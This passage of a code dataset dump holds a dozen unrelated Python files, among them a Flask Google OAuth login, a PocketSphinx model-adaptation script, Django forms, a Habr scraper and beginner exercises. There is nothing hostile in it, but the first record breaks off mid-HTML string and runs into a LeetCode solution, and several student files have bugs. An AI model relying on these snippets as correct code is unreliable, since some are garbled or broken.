upgrade the '\n 'authorization code.'), 401)\n return response\n # if able to trade for credentials, check if access_token is valid\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n # result contains our client id and the logged in user's info\n result = json.loads(h.request(url, 'GET')[1].decode())\n\n # if there is an error in the access token, then give error response\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # if ther were no issues with the state or exchanging for access token,\n # check to see if the access token's id 
matches the google user id\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(json.dumps(\"Token's user ID does not match \"\n \"given user ID\"), 401)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # verify that the access token is valid for our app\n if result['issued_to'] != CLIENT_ID:\n response = make_response(json.dumps(\"Token's user ID doesn't match \"\n \"app's ID\"), 401)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # check to see if user is already logged in\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n # if these 2 are stored and matches, then the user is already logged in\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(json.dumps('User is already connected'), 200)\n response.headers['Content-type'] = 'application/json'\n return response\n\n # if access token user matches logged in user and client id matches\n # client id, get the user info from google\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n # store the users info in login_session\n login_session['provider'] = 'google'\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n login_session['username'] = data.get('name','')\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n # check to see if user is found in database and\n # then populate the login_session['user_id']\n user_id = getUserID(login_session['email'])\n if not user_id:\n user_id = createUser(login_session)\n user = getUserInfo(user_id)\n login_session['user_id'] = user.id\n\n output = ''\n output += '
<h1>Welcome, '\n    output += login_session['username']\n    output += '!</h1>
        '\n output += ' ListNode:\n prehead = head = ListNode()\n p1, p2, carry = l1, l2, 0\n\n while p1 or p2 or carry:\n _sum = (p1.val if p1 else 0) + (p2.val if p2 else 0) + carry\n toAdd, carry = _sum % 10, _sum >= 10\n head.next = ListNode(toAdd)\n p1 = p1.next if p1 else None\n p2 = p2.next if p2 else None\n head = head.next\n return prehead.next\n","sub_path":"leetcode/list/2_add_two_numbers.py","file_name":"2_add_two_numbers.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"484971547","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nimport uuid\n\n\nclass Foo(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False,\n )\n\n name = models.CharField(\n max_length=255,\n default='Foobar',\n )\n","sub_path":"testit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"631381840","text":"import arcpy\n\nfootprints_file = r'C:\\Users\\ksutton\\Documents\\Data\\LPC_IL_HD_Bld_DB_10_19_18.shp'\n\ndef select_bin_ids(\n input_bin, # this is the input BIN ID\n input_footprints, # this is the historic footprints file\n distance, # this is the buffer distance\n):\n sql_bin = '\"BIN\" = 1011258'.format(input_bin)\n\n if arcpy.Exists('build_lyr'):\n arcpy.Delete_management('build_lyr')\n if arcpy.Exists('select_bin_lyr'):\n arcpy.Delete_management('select_bin_lyr')\n if arcpy.Exists('in_memory/buffer'):\n arcpy.Delete_management('in_memory/buffer')\n\n arcpy.MakeFeatureLayer_management(\n input_footprints, # input feature class\n \"build_lyr\", # output layer\n sql_bin, # sql statement\n )\n\n arcpy.Buffer_analysis(\n \"build_lyr\",\n \"in_memory/buffer4\",\n distance,\n )\n\n arcpy.MakeFeatureLayer_management(\n input_footprints,\n 'select_bin_lyr'\n )\n arcpy.SelectLayerByLocation_management(\n 'select_bin_lyr',\n 'INTERSECT',\n 'in_memory/buffer4'\n )\n\n bin_list = []\n\n with arcpy.da.SearchCursor('select_bin_lyr', 'BIN') as cursor:\n for row in cursor:\n bin_list.append(row[0])\n\n arcpy.Delete_management('build_lyr')\n arcpy.Delete_management('select_bin_lyr')\n arcpy.Delete_management('in_memory/buffer')\n\n return bin_list\n\nprint(select_bin_ids('1011258', footprints_file, '400 Feet'))\n\nprint(yup)","sub_path":"students/ksutton/BBL_LPC/select_bin_ids.py","file_name":"select_bin_ids.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"390432244","text":"from collections import deque\n\n\n# A class to represent a graph object\nclass Graph:\n # Constructor\n def __init__(self, edges, N):\n # A list of lists to represent an adjacency list\n self.adjList = [[] for _ in range(N)]\n\n # add edges to the undirected graph\n for (src, dest) in edges:\n self.adjList[src].append(dest)\n\n\n# Function to perform DFS traversal in a directed graph to find the\n# complete path between source and destination vertices\ndef isConnected(graph, src, dest, discovered, path):\n # mark the current node as discovered\n discovered[src] = True\n\n # include the current node in the path\n path.append(src)\n\n # if destination vertex is found\n if src == dest:\n return True\n\n # do for every edge `src —> i`\n for i in graph.adjList[src]:\n\n # if `u` is not yet discovered\n if not discovered[i]:\n # return true if the 
destination is found\n if isConnected(graph, i, dest, discovered, path):\n return True\n\n # backtrack: remove the current node from the path\n path.pop()\n\n # return false if destination vertex is not reachable from src\n return False\n\n\nif __name__ == '__main__':\n\n # List of graph edges as per the above diagram\n edges = [\n (0, 3), (1, 0), (1, 2), (1, 4), (2, 7), (3, 4),\n (3, 5), (4, 3), (4, 6), (5, 6), (6, 7)\n ]\n\n # total number of nodes in the graph (labeled from 0 to `N-1`)\n N = 8\n\n # build a graph from the given edges\n graph = Graph(edges, N)\n\n # to keep track of whether a vertex is discovered or not\n discovered = [False] * N\n\n # source and destination vertex\n (src, dest) = (0, 10)\n\n # List to store the complete path between source and destination\n path = deque()\n\n # perform DFS traversal from the source vertex to check the connectivity\n # and store path from the source vertex to the destination vertex\n if isConnected(graph, src, dest, discovered, path):\n print(\"Path exists from vertex\", src, \"to vertex\", dest)\n print(\"The complete path is\", list(path))\n else:\n print(\"No path exists between vertices\", src, \"and\", dest)\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"209711031","text":"'''\n동시 작업 수행 -thread\n'''\n\n\"\"\"\n첫 번째 for문에서 ['you', 'need', 'python']이라는 리스트의 요소 개수만큼 스레드가 생성되고, \n생성된 스레드는 say 메서드를 수행하게 되어 1초에 한 번씩 입력으로 받은 msg 변수값을 리턴합니다.\n스레드는 메인 프로그램과는 별도로 실행되어 집니다.\nt.daemon = True와 같이 daemon 플래그를 설정하면 주 프로그램이 종료되는 순간 데몬 스레드도 함께 종료된다.\n\"\"\"\n\nimport threading\nimport time\n\ndef say(msg):\n while True:\n time.sleep(1)\n print(msg)\n\nfor msg in ['just', 'do', 'it']:\n t = threading.Thread(target=say, args=(msg,))\n t.daemon = True\n t.start()\n\n\"\"\"\n두 번째 for문은 매 0.1초마다 0부터 99까지 숫자를 출력하는데, \n바로 이 부분이 메인 프로그램이 되며 이 메인 프로그램이 종료되는 순간 생성된 스레드들도 함께 종료가 됩니다.\n\n\"\"\"\nfor i in range(100):\n time.sleep(0.1)\n print(i)","sub_path":"PythonMain/src/ch17-thread/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"619813268","text":"# Copyright 2019 IBM. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"\nrewrite.py\n\nGraph rewrites that ship with the GraphDef Editor.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nfrom typing import Tuple, Dict, FrozenSet, Iterable, Union\n\nfrom graph_def_editor import graph, node, util, tensor, variable\n\n\n__all__ = [\n \"change_batch_size\",\n]\n\n\ndef change_batch_size(g: graph.Graph,\n new_size: int,\n inputs: Iterable[Union[node.Node, tensor.Tensor]]):\n \"\"\"\n Change the batch size of a model.\n\n Runs size inference over the graph to propagate the new batch size\n throughout the graph.\n\n Modifies the graph in place. If the rewrite fails, the graph may be left\n in an inconsistent state.\n\n Args:\n g: The graph on which to modify the batch size. Modified in place.\n new_size: New batch size to apply on the input(s) to the graph.\n Can be `None` to indicate dynamic batch size.\n inputs: Placeholder nodes that are the input to the graph, either\n the `Node`s themselves or as their output `Tensor`s\n \"\"\"\n input_nodes = [i.node if isinstance(i, tensor.Tensor) else i\n for i in inputs]\n\n # Basic sanity checks\n for n in input_nodes:\n if n.op_type != \"Placeholder\":\n raise ValueError(\"Input node {} is not a Placeholder\".format(n))\n if n.graph is not g:\n raise ValueError(\"Input node {} is not in graph {}\".format(n, g))\n\n # Update input nodes\n for n in input_nodes:\n orig_shape = n.get_attr(\"shape\")\n new_dims = [d for d in orig_shape.dims]\n new_dims[0] = new_size\n n.replace_attr(\"shape\", tf.TensorShape(new_dims))\n\n # Propagate new batch size throughout graph\n g.infer_shapes_and_dtypes()\n\n\n\n\n\n\n","sub_path":"graph_def_editor/rewrite.py","file_name":"rewrite.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"237407318","text":"from django import template\n\nimport json\nfrom collections import Mapping\n\nregister = template.Library()\n\n\n@register.filter\ndef transform_parameters(parameters):\n keys_set = {'optional', 'max_occurrence'}\n transformed_dictionary = {}\n for key, value in parameters.items():\n if key not in keys_set:\n if isinstance(value, Mapping):\n if 'Enumeration' in value:\n transformed_dictionary.update({key: 'Enumeration'})\n else:\n transformed_dictionary[key] = transform_parameters(value)\n else:\n transformed_dictionary.update({key: value})\n return transformed_dictionary\n\n\n@register.filter\ndef parameters_to_json(parameters):\n dictionary = transform_parameters(parameters)\n return json.dumps(dictionary, indent=4, separators=(',', ': 
'))\n\n","sub_path":"SOAP/templatetags/tags_extra.py","file_name":"tags_extra.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"484606981","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 13 18:00:39 2016\n\n@author: Pankaj\n\"\"\"\nfrom subprocess import call\nimport sys\nimport os\nimport codecs\nimport time\nimport adapter.unicodedata2 as uc\nfrom adapter.lm import lmgen\nfrom adapter.adcfg import voice_derivatives\nfrom adapter.adutil import file_split\nfrom adapter.adutil import create_fileids\nfrom adapter.adutil import create_transcripts\nfrom adapter.adutil import read_words\nfrom adapter.adutil import create_dictionary\nimport make_local_pdict as ml\n\n\nwavdir = \"E:\\\\New_Corpus\"\nbindir = \"E:\\\\AudioTranscriptVerifier\\\\bin\"\nlmname = \"E:\\\\AudioTranscriptVerifier\\\\adapter\\\\etc\\\\adaptation.lm\"\ntransfile = \"etc\\\\hindi_model_train.transcription\"\ntrfile = \"etc\\\\train.transcription\"\nsuper_prompts_file = \"etc\\\\hindi_model_train_prompt.txt\"\nphonefile = \"..\\\\bin\\\\phonemap.txt\"\nhindi_phone_file = \"..\\\\bin\\\\hindiphone.txt\"\ninfile = \"etc\\\\hindi_model_train_prompt.txt\"\nvocabfile = \"etc\\\\hindi_model_train_vocab.txt\"\noutfile = \"etc\\\\hindi_model_train_adaptation.dic\"\ndictutil = \"E:\\\\AudioTranscriptVerifier\\\\bin\\\\progen.exe\"\n\ntrain_fileid = \"etc\\\\hindi_model_adapt.fileids\"\nmfc_fileids_file = \"etc\\\\hindi_model_adapt_mfc.fileids\"\n\nwavdir = \"E:\\\\New_Corpus\"\nmfcdir = \"E:\\\\New_Corpus\"\nmetadata = \"metadata\"\n\nrootdir = \"E:\\\\AudioTranscriptVerifier\"\n\norg_model = rootdir + \"\\\\\" + \"models\\\\en-us\"\nadapt_model = rootdir + \"\\\\\" + \"models\\\\en-us-adapt\"\n\ntrain_dict = \"..\\\\train.dic\"\nlanguage_model = \"..\\\\reverie.lm\"\ndictionary = train_dict\t\nhypfile = \"result\\\\hindi_adapt.hyp.txt\"\ncepdir = wavdir\nwavdirs_and_files = [\t\t\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\Niyanta\",\"bohni.raw\",\"bohni.txt\"],\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\Final\\\\anubhav\",\"anubhav.raw\",\"anubhav.txt\"],\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\ToBeVerified\\\\part4\",\"part4.raw\",\"part4.txt\"],\n\t\t\t\t\t\t# [\"\\\\train\\\\others\\\\accomodation\\\\ToBeVerified\\\\Niyanta\\\\part12\",\"part12.raw\",\"part12.txt\"],\n\t\t\t\t\t\t[\"\\\\train\\\\others\\\\accomodation\\\\ToBeVerified\\\\arun\",\"1.raw\",\"1.txt\"],\n]\n\n# Delete existing .raw files if any from train_audio folder\n# First split the raw audio files in audio segments\nfor rawfiles in wavdirs_and_files:\n\tdirname = rawfiles[0]\n\tinraw_file = wavdir + \"\\\\\" + dirname + \"\\\\\" + rawfiles[1]\n\trawdir = wavdir + \"\\\\\" + dirname + \"\\\\\" + \"train_audio\"\n\tcallcmd = \"del \" + rawdir + \"\\\\*.raw\"\n\tcall(callcmd,shell=True)\n\tfile_split(bindir,inraw_file,rawdir)\n\n# Check whether transcripts file lines are equal to no of raw files\nDIR = wavdir + \"\\\\\" + wavdirs_and_files[0][0]\nprint (\"helllo\")\ntranscriptscnt=0\nrawfilescnt=0\nfor name in os.listdir(DIR+\"\\\\\"+\"train_audio\"):\n\tif os.path.isfile(os.path.join(DIR+\"\\\\\"+\"train_audio\", name)):\n\t\trawfilescnt=rawfilescnt+1\n\nwith open(DIR+\"\\\\\"+wavdirs_and_files[0][2],\"r\",encoding=\"utf-8\") as fr:\n\tfor f in fr:\n\t\ttranscriptscnt=transcriptscnt+1\nif transcriptscnt!=rawfilescnt:\n\tprint(\"Mismatch in Transcripts and rawfiles count\")\n\tprint(\"Rawfiles_Count= 
\"+str(rawfilescnt))\n\tprint(\"Transcripts_Count= \" + str(transcriptscnt))\n\texit(1)\nprint(\"Rawfiles_Count= \"+str(rawfilescnt))\nprint(\"Transcripts_Count= \" + str(transcriptscnt))\n\n# create train_audio and train_mfc directories\ndirlist = []\n#mfdirlist = []\nfor lst in wavdirs_and_files:\n\tprint(lst[0])\n\tdirlist.append(lst[0])\n\t\n#for lst in dirlist:\n#\tmfdirlist.append(lst + \"\\\\train_mfc\")\n\n#print(dirlist)\n\n# create fileids\n\ncreate_fileids(wavdir,dirlist,train_fileid,mfc_fileids_file)\n\n\t\t\t\naudiodir = wavdir\n\ntransdir = wavdir\nscriptlist = []\n\nfor lst in wavdirs_and_files:\n\tscriptlist.append(lst[0] + \"\\\\\" + lst[2])\n\t\nprint(scriptlist)\n\ndirlist = []\nfor lst in wavdirs_and_files:\n\tdirlist.append(lst[0] + \"\\\\train_audio\")\n\t\nprint(dirlist)\n\ncreate_transcripts(transfile,super_prompts_file,trfile,scriptlist,dirlist,wavdir)\n\nml.createDictionary(super_prompts_file, train_dict)\n#create_dictionary(\"..\\\\eng.dic\",super_prompts_file,dictutil,phonefile,train_dict)\n\ndirlist = []\nfor lst in wavdirs_and_files:\n\tprint(lst[0])\n\tdirlist.append(lst[0])\n\ncall(\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\sphinx_fe -argfile\" + \" \" + org_model + \"\\\\feat.params\" + \\\n\t\t\t\t\t \" -samprate 16000\" + \" -c\" + \" \" + train_fileid + \\\n\t\t\t\t \" -di\" + \" \" + wavdir + \\\n\t\t\t\t \" -do\" + \" \" + mfcdir + \\\n\t\t\t\t \" -ei raw -eo mfc -mswav no\",shell=True\n\t\t\t\t )\n\nfor di in dirlist:\n\tdirname = wavdir + \"\\\\\" + di\n\tprint(dirname)\n\tsrcdir = dirname + \"\\\\train_audio\"\n\tprint(srcdir)\n\tdstdir = dirname + \"\\\\train_mfc\"\n\tcallstr = \"mkdir\" + \" \" + dstdir\n#\tprint(callstr)\n\tcall(callstr,shell=True)\n\tcallstr = \"move\" + \" \" + srcdir + \"\\\\*.mfc\" + \" \" + dstdir \n#\tprint(callstr)\n\tcall(callstr,shell=True)\n\ntime.sleep(2)\n\ncall(\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\pocketsphinx_mdef_convert\" + \" -text\" + \" \" + org_model + \"\\\\mdef\" + \" \" + org_model + \"\\\\mdef.txt\",shell=True)\n\ntime.sleep(2)\n\nprint(\"calling bw\")\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\bw\" + \" \" + \"-hmmdir\" + \" \" + org_model + \\\n\t\t\t\t\t\" -moddeffn\" + \" \" + org_model + \"\\\\mdef.txt\" + \\\n\t\t\t\t\t\" -ts2cbfn .ptm. -feat 1s_c_d_dd -svspec 0-12/13-25/26-38\" + \\\n\t\t\t\t\t\" -cmn current -agc none -dictfn\" + \" \" + train_dict + \\\n\t\t\t\t\t\" -ctlfn\" + \" \" + mfc_fileids_file + \\\n\t\t\t\t\t\" -lsnfn\" + \" \" + transfile + \\\n\t\t\t\t\t\" -accumdir\" + \" \" + metadata\n )\ntime.sleep(2)\nprint(\"calling mmlr_solve\")\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\mllr_solve\" + \" \" + \"-meanfn\" + \" \" + org_model + \"\\\\means\" + \\\n\t\t\t\t\t\t\t\t \" -varfn\" + \" \" + org_model + \"\\\\variances\" + \\\n\t\t\t\t\t\t\t\t \" -outmllrfn\" + \" \" + metadata + \"\\\\mllr_matrix\" + \\\n\t\t\t\t\t\t\t\t \" -accumdir\" + \" \" + metadata,shell=True\n )\t\n\ntime.sleep(2)\n\nprint(\"copying models\")\ncallstr = \"md\" + \" \" + adapt_model\nprint(callstr)\ncall(callstr,shell=True)\ncall(\"copy E:\\\\AudioTranscriptVerifier\\\\models\\\\en-us\\\\*.* E:\\\\AudioTranscriptVerifier\\\\models\\\\en-us-adapt\",shell=True)\n\ntime.sleep(2)\nprint(\"calling map_adapt\")\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\map_adapt\" + \" \" + \"-moddeffn\" + \" \" + org_model + \"\\\\mdef.txt\" + \\\n\t\t\t\t\t\t \" -ts2cbfn .ptm. 
\" + \\\n\t\t\t\t\t\t\t \" -meanfn\" + \" \" + org_model + \"\\\\means\" + \\\n\t\t\t\t\t\t\t \" -varfn\" + \" \" + org_model + \"\\\\variances\" + \\\n\t\t\t\t\t\t\t \" -mixwfn\" + \" \" + org_model + \"\\\\mixture_weights\" + \\\n\t\t\t\t\t\t\t \" -tmatfn\" + \" \" + org_model + \"\\\\transition_matrices\" + \\\n\t\t\t\t\t\t\t \" -accumdir\" + \" \" + metadata + \\\n\t\t\t\t\t\t\t \" -mapmeanfn\" + \" \" + adapt_model + \"\\\\means\" + \\\n\t\t\t\t\t\t\t \" -mapvarfn\" + \" \" + adapt_model + \"\\\\variances\" + \\\n\t\t\t\t\t\t\t \" -mapmixwfn\" + \" \" + adapt_model + \"\\\\mixture_weights\" + \\\n\t\t\t\t\t\t\t \" -maptmatfn\" + \" \" + adapt_model + \"\\\\transition_matrices\"\n )\n\t\ntime.sleep(2)\nprint(\"calling sendump\")\n\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\mk_s2sendump\" + \" \" + \"-pocketsphinx yes\" + \\\n\t\t\t\t\t\t \" -moddeffn\" + \" \" + adapt_model + \"\\\\mdef.txt\" + \\\n\t\t\t\t\t\t\t\t\t\" -mixwfn\" + \" \" + adapt_model + \"\\\\mixture_weights\" + \\\n\t\t\t\t\t\t\t\t\t\" -sendumpfn\" + \" \" + adapt_model + \"\\\\sendump\" \n )\n\ntime.sleep(2)\t\n\n\n#lmgen(infile,lmname)\n\n'''\nprint(\"calling pocketsphinx_batch\")\t\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\pocketsphinx_batch\" + \\\n\t\t\" -adcin yes\" + \\\n\t\t\" -cepdir\" + \" \" + cepdir + \\\n\t\t\" -cepext\" + \" \" + \".raw\" + \\\n\t\t\" -ctl\" + \" \" + train_fileid + \\\n\t\t\" -lm\" + \" \" + language_model + \\\n\t\t\" -dict\" + \" \" + dictionary + \\\n\t\t\" -hmm\" + \" \" + adapt_model + \\\n\t\t\" -hyp\" + \" \" + hypfile\n\t\t#\" -mllr\" + \" \" + metadata + \"\\\\mllr_matrix\" \n )\n\n\t\n\t\ntime.sleep(2)\t\n\t\ncallcmd = \"perl E:\\\\AudioTranscriptVerifier\\\\bin\\\\word_align.pl\" + \" \" + trfile + \" \" + hypfile \nprint(callcmd)\ncmdcall = callcmd + \" > result\\\\res_adapt.txt\"\nprint(cmdcall)\ncall(\n\t\tcmdcall, shell=True\n )\n'''\n'''\t\nprint(\"calling pocketsphinx_batch\")\t\ncall(\n\t\t\"E:\\\\AudioTranscriptVerifier\\\\bin\\\\pocketsphinx_batch\" + \\\n\t\t\" -adcin yes\" + \\\n\t\t\" -cepdir\" + \" \" + cepdir + \\\n\t\t\" -cepext\" + \" \" + \".raw\" + \\\n\t\t\" -ctl\" + \" \" + train_fileid + \\\n\t\t\" -lm\" + \" \" + language_model + \\\n\t\t\" -dict\" + \" \" + dictionary + \\\n\t\t\" -hmm\" + \" \" + org_model + \\\n\t\t\" -hyp\" + \" \" + hypfile\n\t\t#\" -mllr\" + \" \" + metadata + \"\\\\mllr_matrix\" \n )\n\n\t\n\t\ntime.sleep(2)\t\n\t\nc allcmd = \"perl E:\\\\AudioTranscriptVerifier\\\\bin\\\\word_align.pl\" + \" \" + trfile + \" \" + hypfile \nprint(callcmd)\ncmdcall = callcmd + \" > result\\\\res.txt\"\nprint(cmdcall)\ncall(\n\t\tcmdcall, shell=True\n )\n'''","sub_path":"adapter/ad.py","file_name":"ad.py","file_ext":"py","file_size_in_byte":8085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558318749","text":"##min_likes = 500\n##min_shares = 100\n##\n##num_likes = 550\n##num_shares = 101\n##\n##if num_likes < min_likes:\n## print(\"Za mało lików do promocji\")\n##else:\n## if num_shares < min_shares:\n## print(\"za mało szerów do promocji\")\n## else:\n## print(\"Ceny idą w dół\")\n## \n##print('----')\n##\n##if num_likes < min_likes:\n## print(\"Za mało lików do promocji\")\n##elif num_shares < min_shares:\n## print(\"za mało szerów do promocji\")\n##else:\n## print(\"Ceny idą w dół\")\n\n##if num_likes >= MIN_LIKES and num_shares >= MIN_SHARES:\n##\n## print('GREAT! 
Today our prizes drop 10% !!!')\n##\n##else:\n##\n## if num_likes = MIN_LIKES and num_shares >= MIN_SHARES:\n##\n## print('GREAT! Today our prizes drop 10% !!!')\n##\n##elif num_likes diskSizeUsed and fileSize > 0 and fileSize <= diskSize-diskSizeUsed:\n## print(\"file can be downloaded\")\n##else:\n## print(\"brak miejsca na dysku\")\n","sub_path":"Python_courses/Python_dla_poczatkujacych/06_72_IfElif_LAB.py","file_name":"06_72_IfElif_LAB.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645949353","text":"import base64\nimport re\nimport uuid\n\nfrom django import forms\n\nfrom botbot.apps.accounts import models as accounts_models\nfrom . import models\n\nserver_regex = re.compile(r\"^[\\w\\-\\.]*\\:\\d*$\")\n\nclass ChannelForm(forms.ModelForm):\n identifiable_url = forms.BooleanField(\n required=False, initial=True, help_text=\"Identifiable URLs may leak \"\n \"channel information as part of the referrer details if when URL \"\n \"is clicked from the logs\")\n\n class Meta:\n model = models.Channel\n fields = ('chatbot', 'name', 'password', 'is_public', 'is_active')\n\n def save(self, *args, **kwargs):\n \"\"\"\n If it's an identifiable url, set the slug to ``None``.\n\n If it's not an identifiable url, set the slug to a random value if it\n is not already set.\n \"\"\"\n if self.cleaned_data['identifiable_url']:\n self.instance.slug = None\n elif not self.instance.slug:\n channels = models.Channel.objects.all()\n while not self.instance.slug or\\\n channels.filter(slug=self.instance.slug).exists():\n self.instance.slug = base64.b32encode(uuid.uuid4().bytes)[:4]\\\n .lower()\n return super(ChannelForm, self).save(*args, **kwargs)\n\nclass ChannelRequestForm(forms.Form):\n channel_name = forms.CharField()\n server = forms.CharField(label=\"IRC Server\")\n github = forms.URLField(label=\"GitHub Repo URL\",\n help_text=\"If the channel supports a github repo, the url to the repo.\",\n required=False)\n\n name = forms.CharField(label=\"Your name\")\n email = forms.EmailField(label=\"Your e-mail\")\n nick = forms.CharField(label=\"Your IRC Nick\")\n op = forms.BooleanField(label=\"Are you a channel op?\")\n\n def clean_channel_name(self):\n channel_name = self.cleaned_data['channel_name']\n if models.Channel.objects.filter(name=channel_name).exists():\n raise forms.ValidationError(\"Sorry, this channel is already being monitored.\")\n\n return channel_name\n\n def clean_server(self):\n server = self.cleaned_data['server']\n if not server_regex.match(server):\n raise forms.ValidationError(\"Incorrect format, should be :\")\n return server\n\n\nclass UsersForm(forms.Form):\n users = forms.ModelMultipleChoiceField(required=False,\n queryset=accounts_models.User.objects.all())\n\n def __init__(self, channel, *args, **kwargs):\n super(UsersForm, self).__init__(*args, **kwargs)\n self.channel = channel\n if channel:\n self.fields['users'].initial = [p.pk for p in channel.users.all()]\n\n def save(self):\n users = self.cleaned_data['users']\n self.channel.membership_set.exclude(user__in=users).delete()\n for user in users:\n self.channel.membership_set.get_or_create(user=user)\n","sub_path":"botbot/apps/bots/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"265401998","text":"import lxml.html as html\nimport requests\nimport sys\nimport json\n\n\ndef main():\n data = []\n 
main_domain = ['/page1/']\n while main_domain:\n\n req = requests.get('https://habr.com' + main_domain[0])\n page = html.fromstring(req.content)\n main_domain_stats = page.xpath(\n '//li[contains(@class, \"content-list__item\")]/article[contains(@class, \"post\")]/h2/a/@href'\n )\n for main_domain_stat in main_domain_stats:\n req = requests.get(main_domain_stat)\n page = html.fromstring(req.content)\n\n article = page.xpath(\n '//div[@class=\"post__wrapper\"]'\n )\n title = article[0].xpath(\n './h1/span/text()'\n )\n text = article[0].xpath(\n './div[contains(@class, \"post__body\")]/div[contains(@class, \"post__text\")]//text()'\n )\n images = article[0].xpath(\n './div[contains(@class, \"post__body\")]/div[contains(@class, \"post__text\")]/img/@src'\n )\n\n data.append({\n 'title': title[0],\n 'content': {\n 'text': text,\n 'images': images\n }\n })\n print('https://habr.com' + main_domain[0])\n\n req = requests.get('https://habr.com' + main_domain[0])\n page = html.fromstring(req.content)\n main_domain = page.xpath(\n '//li[@class=\"arrows-pagination__item\"]/a[contains(@class, \"arrows-pagination__item-link_next\")]/@href'\n )\n with open('Output.txt', 'w') as outfile:\n json.dump(data, outfile, indent=3, ensure_ascii=False)\n outfile.close()\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"habr_parsing/habr_parsing.py","file_name":"habr_parsing.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"405010995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (\n absolute_import, division, print_function, unicode_literals\n)\n\nimport subprocess\nimport sys\n\nimport six\nfrom flake8.main import main as flake8_main\nfrom libmodernize.main import main as libmodernize_main\n\n\nCODE_PATHS = [\n 'lint.py',\n 'pyticketswitch',\n 'tests',\n]\n\n\ndef main():\n exit_on_failure(run_flake8())\n exit_on_failure(run_modernize())\n exit_on_failure(run_isort())\n\n\ndef run_flake8():\n print('Running flake8 code linting')\n try:\n original_argv = sys.argv\n sys.argv = ['flake8'] + CODE_PATHS\n did_fail = False\n flake8_main()\n except SystemExit:\n did_fail = True\n finally:\n sys.argv = original_argv\n\n if did_fail:\n print('flake8 failed')\n else:\n print('flake8 passed')\n return did_fail\n\n\ndef run_modernize():\n print('Running modernize checks')\n try:\n orig_stdout = getattr(sys, 'stdout')\n out = six.StringIO()\n setattr(sys, 'stdout', out)\n libmodernize_main(CODE_PATHS)\n finally:\n sys.stdout = orig_stdout\n output = out.getvalue()\n print(output)\n ret = len(output)\n if ret:\n print('modernize failed')\n else:\n print('modernize passed')\n return ret\n\n\ndef run_isort():\n print('Running isort check')\n return subprocess.call([\n 'isort', '--recursive', '--check-only', '--diff',\n '-a', 'from __future__ import absolute_import, print_function, division, unicode_literals',\n ] + [x for x in CODE_PATHS if x != 'tests'])\n\n\ndef exit_on_failure(ret):\n if ret:\n sys.exit(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lint.py","file_name":"lint.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 